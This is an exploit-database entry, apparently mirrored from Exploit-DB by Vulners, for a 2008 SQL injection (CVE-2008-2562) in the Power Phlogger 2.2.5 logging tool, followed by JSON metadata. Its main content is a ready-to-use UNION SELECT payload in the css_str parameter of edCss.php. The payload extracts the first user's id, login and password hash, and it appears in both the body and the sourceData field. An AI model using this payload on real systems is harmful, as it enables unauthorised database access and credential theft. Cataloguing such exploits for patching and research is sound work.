Search...

Power Phlogger 2.2.5 css_str SQL Injection Vulnerability

2008-06-05T00:00:00

ID EDB-ID:5744
Type exploitdb
Reporter MustLive
Modified 2008-06-05T00:00:00

Description

Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability. CVE-2008-2562. Webapps exploit for php platform

                                        
                                            ############################################################

SQL Injection vulnerability in Power Phlogger

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2158/

Description: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.
 
SQL Injection:
 
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
 
With this query you will receive id, login and password (hash) of first user.
 
Vulnerable versions are Power Phlogger &lt;= 2.2.5.
 
############################################################

# milw0rm.com [2008-06-05]

JSON Vulners Source

Initial Source

{"published": "2008-06-05T00:00:00", "id": "EDB-ID:5744", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "1dbf25c62b38051e8297868f7339e38e25c407cfe115ce4a3db76112a8d1c2fa", "description": "Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability. CVE-2008-2562. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/5744/", "lastseen": "2016-01-31T23:30:48", "edition": 1, "title": "Power Phlogger 2.2.5 css_str SQL Injection Vulnerability", "osvdbidlist": ["45976"], "modified": "2008-06-05T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": ["CVE-2008-2562"], "sourceHref": "https://www.exploit-db.com/download/5744/", "references": [], "reporter": "MustLive", "sourceData": "############################################################\n\nSQL Injection vulnerability in Power Phlogger\n\nBy MustLive (http://websecurity.com.ua)\n\nDetailed information: http://websecurity.com.ua/2158/\n\nDescription: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.\n \nSQL Injection:\n \nhttp://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit\n \nWith this query you will receive id, login and password (hash) of first user.\n \nVulnerable versions are Power Phlogger <= 2.2.5.\n \n############################################################\n\n# milw0rm.com [2008-06-05]\n", "objectVersion": "1.0"}

{"result": {"cve": [{"id": "CVE-2008-2562", "type": "cve", "title": "CVE-2008-2562", "description": "SQL injection vulnerability in edCss.php in PowerPhlogger 2.2.5 and earlier allows remote authenticated users to execute arbitrary SQL commands via the css_str parameter in an edit action.", "published": "2008-06-06T14:32:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2562", "cvelist": ["CVE-2008-2562"], "lastseen": "2017-09-29T14:25:55"}]}}